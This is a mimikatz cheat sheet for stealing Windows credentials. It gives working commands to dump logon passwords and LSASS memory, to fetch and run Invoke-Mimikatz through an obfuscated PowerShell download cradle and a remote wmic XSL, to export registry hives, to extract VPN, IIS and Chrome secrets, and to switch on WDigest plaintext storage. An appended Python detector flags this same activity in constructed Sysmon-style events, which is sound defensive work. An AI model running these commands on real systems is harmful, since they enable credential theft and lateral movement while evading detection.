Using mimikatz
1. Getting passwords
privilege::debug
sekurlsa::logonpasswords

mimikatz.exe "sekurlsa::debug" "sekurlsa::logonPasswords full" >>1.txt exit
I usually use a bat file:
@echo off
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>C:\programdata\1.txt
2. Getting passwords with PowerShell
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
3. Obfuscation
powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttps://raw.gith'+'ubus'+'erco'+'ntent.com/matt'+'ife'+'stati'+'on/Power'+'Sploit/ma'+'ster/Exfil'+'tration/Invok'+'e-Mi'+'mikatz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"
4. Getting passwords with wmic
wmic os get /format:"https://gist.githubusercontent.com/manasmbellani/7f3e39170f5bc8e3a493c62b80e69427/raw/87550d0fc03023bab99ad83ced657b9ef272a3b2/mimikatz.xsl"
5. Offline password extraction with procdump
procdump64.exe -accepteula -ma lsass.exe 1.dmp
mimikatz.exe "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit
6. Exporting hashes offline from the registry
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
mimikatz.exe "lsadump::sam /system:system.hiv /sam:sam.hiv" exit
7. Getting VPN passwords
mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit vpn
mimikatz.exe "sekurlsa::minidump 1.dmp" token::elevate lsadump::sam lsadump::secrets exit vpn
8. Reading passwords from the IIS7 configuration file
mimikatz.exe privilege::debug log "iis::apphost /in:"%systemroot%\system32\inetsrv\config\applicationHost.config" /live" exit
9. Getting browser passwords and cookies
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\USERDA~1" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit # read Chrome passwords
10. Getting passwords with mimikatz on Server 2012
Modify the registry:
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1
Lock the server screen:
rundll32.exe user32.dll,LockWorkStation
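As an added example (not part of the original cheat sheet), here is a small Python detector from the defender's side: it runs over constructed Sysmon-style events and flags the activity the sections above leave in telemetry, namely LSASS memory reads (procdump / minidump), the WDigest UseLogonCredential change, hive export with reg save, and mimikatz module names on a command line. The pipe-separated event format and the field names are assumptions modelled on Sysmon event IDs 1, 10 and 13; the sample events are constructed, not real logs.

```python
import re

# Constructed sample events (not real telemetry), one "key=value|..." line each.
# EventID 10 = ProcessAccess, 13 = RegistryEvent (value set), 1 = ProcessCreate.
SAMPLE_EVENTS = [
    r"EventID=10|SourceImage=C:\tools\procdump64.exe|TargetImage=C:\Windows\system32\lsass.exe|GrantedAccess=0x1FFFFF",
    r"EventID=10|SourceImage=C:\Windows\system32\csrss.exe|TargetImage=C:\Windows\system32\lsass.exe|GrantedAccess=0x1400",
    r"EventID=13|Image=C:\Windows\regedit.exe|TargetObject=HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential|Details=DWORD (0x00000001)",
    r"EventID=1|Image=C:\Windows\system32\reg.exe|CommandLine=reg save HKLM\SAM sam.hiv",
    r"EventID=1|Image=C:\Windows\system32\notepad.exe|CommandLine=notepad.exe readme.txt",
]

PROCESS_VM_READ = 0x0010  # access right needed to read LSASS memory (full dump also needs QUERY_INFORMATION)
WDIGEST_VALUE = r"\securityproviders\wdigest\uselogoncredential"
HIVE_SAVE = re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)
MIMIKATZ_MODULES = re.compile(r"(sekurlsa|lsadump|dpapi)::", re.I)

def parse(line):
    """Split one constructed event line into a field dict."""
    return dict(field.split("=", 1) for field in line.split("|"))

def classify(event):
    """Return the name of the matching rule, or None for benign events."""
    eid = event.get("EventID")
    if eid == "10":
        # Any process opening lsass.exe with VM_READ can dump credentials.
        if event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
            if int(event.get("GrantedAccess", "0"), 16) & PROCESS_VM_READ:
                return "lsass-memory-read"
    elif eid == "13":
        # UseLogonCredential=1 makes WDigest keep plaintext passwords in memory.
        target = event.get("TargetObject", "").lower()
        if target.endswith(WDIGEST_VALUE) and "0x00000001" in event.get("Details", ""):
            return "wdigest-plaintext-enabled"
    elif eid == "1":
        cmd = event.get("CommandLine", "")
        if HIVE_SAVE.search(cmd):       # reg save HKLM\SAM / SYSTEM / SECURITY
            return "registry-hive-export"
        if MIMIKATZ_MODULES.search(cmd):  # sekurlsa:: / lsadump:: / dpapi:: on the command line
            return "mimikatz-module-invocation"
    return None

def scan(lines):
    """Return (rule, line) pairs for every event that matches a rule."""
    hits = []
    for line in lines:
        rule = classify(parse(line))
        if rule:
            hits.append((rule, line))
    return hits

if __name__ == "__main__":
    for rule, line in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {line}")
```

The csrss.exe event is left alone because 0x1400 carries no VM_READ bit; in production you would additionally allowlist known LSASS readers by signed image path.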